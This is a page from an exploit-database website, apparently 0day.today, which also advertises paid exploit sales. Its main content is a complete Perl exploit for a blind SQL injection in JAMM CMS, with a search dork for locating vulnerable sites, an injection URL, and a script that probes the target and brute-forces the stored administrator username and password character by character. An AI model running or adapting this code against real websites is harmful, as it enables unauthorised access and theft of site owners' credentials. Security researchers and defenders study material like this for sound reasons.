0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

JAMM CMS (id) Remote Blind SQL Injection Exploit

Author

n/a

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-3160

Category

web applications

Date add

10-06-2008

Platform

unsorted

================================================
JAMM CMS (id) Remote Blind SQL Injection Exploit
================================================




#!/usr/bin/perl
######################
#
#JAMM CMS (id) Blind SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "powered by JAMM"
#
##
###
##
#
#http://www.site.de/cms/?id=blah
#Ok when we give $id an unexpected value like this we get an SQL Error.
#Unfortunately the script is so rude that it doesn't want to show us any data when we UNION SELECT.
#But when we give $id an existing value and append AND 1=0 the site changes.
#So Blind SQL Injection is possible.
#For mySQL Version>=5 we can use subquerys to retrive data,
#otherwise we have to use BENCHMARK().
#
#
#SQL Injection:
#http://[target]/[path]/index.php?id=[SQL]
#
#PoC for mySQL Version = 5:
#index.php?id=10/**/and/**/substring((select/**/concat(login,0x3a,password)/**/from/**/jamm_cms_owen_website_user/**/limit/**/0,1),1,1)/**/like/**/0xbla/*
#
#If this condition returns true it would be the same as if we inject AND 1=1
#so the site gives normal output.
#
#Possible Perl Exploit (will not work always because of different tablenames etc):
#THIS IS JUST AN EXAPLE!!!

use LWP::UserAgent;
my $userAgent = LWP::UserAgent->new;

usage();

$server = $ARGV[0];
$dir = $ARGV[1];


print"\n";
if (!$dir) { die "Read Usage!\n"; }


$filename ="index.php";

my $vulnCheck = "http://".$server.$dir.$filename;
;

my @Daten = ("61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","3A","5F","31","32","33","34","35","36","37","38","39","30");

print"[x]Connecting:";
my $Attack= $userAgent->get($vulnCheck."?id='");
if($Attack->is_success)
{
    print " Connected \n";
    print "[x]Vulnerable Check: ";
    if($Attack->content =~ m/You have an error in your SQL syntax/i)
        { print "Vulnerable \n"; }
    else
        { print "Not Vulnerable"; exit;}
}

else
{
    print " Connection Failed";
    exit;
}

my $hex="";
my $length;

print "[x]Bruteforcing Length \n";

my $lengthCounter = 1;
while(1)
{
    ##table name will be different sometimes
    my $url = "".$vulnCheck."?id=10%20%20and%20LENGTH((select%20concat(login,0x3a,password)%20from%20jamm_cms_owen_website_user%20limit%200,1))=".$lengthCounter."";
    my $Attack= $userAgent->get($url);
    my $content = $Attack->content;
    if($content =~ m/<META NAME='Title' CONTENT=''>/i)
    {       
        $lengthCounter++;       
    }
    else
    {
        if($content =~ m/You have an error in your SQL syntax/i)
        {
            print "Something wrong. mySQL Version? "; exit;
        }
       
        else
        {
            $length=$lengthCounter;       
            last;
        }
    }
}


print "[x]Injecting Black Magic \n";

for($b=1;$b<=$length;$b++)
{
    for(my $u=0;$u<28;$u++)
    {       
        ##table name will be different sometimes
        my $url = "".$vulnCheck."?id=10%20%20and%20substring((select%20concat(login,0x3a,password)%20from%20jamm_cms_owen_website_user%20limit%200,1),".$b.",1)%20like%200x".$Daten[$u]."";

        my $Attack= $userAgent->get($url);

        my $content = $Attack->content;
       
        ##This will also change sometimes. Take content of AND 1=0
        if($content =~ m/<META NAME='Title' CONTENT=''>/i)  
        {           
           
        }

        else
        {
            print "[x]    Found Char ".$Daten[$u]."\n";           
            $hex=$hex.$Daten[$u];
            last;           
        }
    }
}

print "[x]Converting \n";
my $a_str = hex_to_ascii($hex);

@login = split(/\:/, $a_str);

print "[x]Success! \n";
print "     Username: $login[0]\n";
print "     Password: $login[1]";
   
sub hex_to_ascii ($)
{       
        (my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg;
        return $str;
}



sub usage()
{
    print q
    {
    ######################################################
             JAMM CMS Remote Blind SQL Injection Exploit   
                         -Written by h0yt3r-            
    Usage: JAMM_CMS.pl [Server] [Path]
    Sample:
    perl JAMM.pl.pl www.site.com /cms/
    ######################################################
    };

}




#  0day.today [2024-12-27]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

JAMM CMS (id) Remote Blind SQL Injection Exploit

Report Error

Report Error